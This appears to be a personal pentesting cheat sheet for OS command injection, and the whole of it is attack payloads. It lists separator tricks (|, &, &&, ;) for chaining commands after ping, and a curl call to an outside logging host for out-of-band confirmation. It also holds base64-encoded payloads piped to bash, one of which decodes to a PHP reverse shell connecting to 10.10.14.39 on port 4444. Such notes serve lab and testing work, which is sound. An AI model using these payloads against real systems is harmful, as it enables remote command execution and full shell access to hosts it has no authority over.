Command Injection

ping - linux

ping -c 2 $IP

ping - windows

ping -n 2 $IP

echo "hack" | id
echo "hack" & id
echo "hack" && id
echo "hack" ; id
echo "hack" ; curl http://log.michalszalkowski.com/15-01-2023/e-corp/test-42

ping -c 2 localhost|id
ping -c 2 localhost | id

ping -c 2 localhost;id
ping -c 2 localhost ; ls -la

ping -c 2 localhost; echo "aWQ=" | base64 -d | bash

ping -c 2 localhost; echo "cGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE0LjM5Iiw0NDQ0KTskcHJvYz1wcm9jX29wZW4oIi9iaW4vYmFzaCIsIGFycmF5KDA9PiRzb2NrLCAxPT4kc29jaywgMj0+JHNvY2spLCRwaXBlcyk7Jw==" | base64 -d | bash